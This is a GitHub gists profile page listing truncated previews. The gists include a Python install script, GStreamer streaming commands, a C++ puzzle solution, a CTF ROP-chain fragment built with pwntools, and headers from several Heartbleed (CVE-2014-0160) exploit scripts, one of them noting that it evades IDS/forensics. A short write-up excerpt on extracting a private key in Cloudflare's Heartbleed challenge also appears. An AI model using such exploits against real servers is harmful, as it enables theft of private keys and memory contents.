Skip to content

Instantly share code, notes, and snippets.

Avatar

esrever10 esrever10

View GitHub Profile
View install-python-2.7.11.sh
#!/bin/bash
sudo apt-get update;
sudo apt-get upgrade;
sudo apt-get install autoconf automake gcc make git;
sudo apt-get install libffi-dev libncurses5-dev openssl patch python-dev python-virtualenv libreadline6-dev libsqlite3-dev libbz2-dev;
sudo apt-get install libsqlite3-dev libbz2-dev libdb5.3-dev tk8.6-dev libncurses5-dev libssl-dev libgdbm-dev;
wget https://launchpad.net/ubuntu/+archive/primary/+files/python2.7_2.7.11.orig.tar.gz;
@esrever10
esrever10 / gs.sh
Last active Aug 9, 2020
gstreamer send and receive h264 rtp stream
View gs.sh
# linux send h264 rtp stream:
gst-launch-1.0 -v ximagesrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# Macos send h264 rtp stream:
gst-launch-1.0 -v avfvideosrc capture-screen=true ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000
# receive h264 rtp stream:
gst-launch-1.0 -v udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! autovideosink
View 495_pwn2.py
from pwn import *
from struct import pack
context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
View hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
View cloudflare_challenge
I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the
10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself
that I too could do it.
First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially
believed that it would be highly improbable under normal conditions to obtain the private key
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to
extract private keys. So I wanted to see first-hand if it was possible or not.
View hb4.c
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics.
*
* https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c
* https://raw.githubusercontent.com/decal/ssltest-stls/master/ssltest-stls.py
View hb3.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.
import sys
import struct
View hb2.c
/*
* CVE-2014-0160 heartbleed OpenSSL information leak exploit
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics. The exploit can set
* the heatbeart payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
View hb1.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
View The broken pedometer.cpp
#include <cstdio>
#include <vector>
#include <bitset>
#include <climits>
#include <iostream>
using namespace std;
#define MAX 15
vector<bitset<MAX> > vec;
You can’t perform that action at this time.